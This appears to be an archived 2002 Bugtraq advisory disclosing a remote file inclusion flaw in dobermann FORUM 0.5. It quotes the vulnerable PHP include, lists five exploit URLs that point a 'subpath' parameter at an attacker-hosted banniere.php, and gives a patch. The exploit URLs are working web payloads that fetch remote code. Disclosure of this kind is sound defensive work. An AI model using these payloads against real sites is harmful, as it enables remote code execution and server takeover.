[27625] in bugtraq
dobermann FORUM (php)
daemon@ATHENA.MIT.EDU (Frog Man)
Mon Oct 28 19:48:35 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 27 Oct 2002 23:53:19 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F162T8esYrJeujjeHdz00004b4a@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Product : dobermann FORUM
version : 0.5
website : http://www.le-dobermann.com
Problem : Include file
PHP Code/location :
°°°°°°°°°°°°°°°°°°°
entete.php
enteteacceuil.php
topic/entete.php :
------------------------------------------
<?php @include $subpath."banniere.php"; ?>
------------------------------------------
index.php
newtopic.php :
------------------------
@require "config.php";
@include("entete.php");
------------------------
Exploits :
°°°°°°°°°°
http://[target]/entete.php?subpath=http://[attacker]/
http://[target]/enteteacceuil.php?subpath=http://[attacker]/
http://[target]/topic/entete.php?subpath=http://[attacker]/
http://[target]/index.php?subpath=http://[attacker]/
http://[target]/newtopic.php?subpath=http://[attacker]/
with
http://[attacker]/banniere.php
Patch :
°°°°°°°
In files :
------------------
entete.php
enteteacceuil.php
topic/entete.php
------------------
replace the line :
------------------------------------------
<?php @include $subpath."banniere.php"; ?>
------------------------------------------
by :
------------------------------------------
<?php
$banfile=$subpath."banniere.php";
if (file_exists($banfile)){
@include $banfile; }
?>
------------------------------------------
More details in french :
http://www.frog-man.org/tutos/dobermannFORUM.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FdobermannFORUM.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
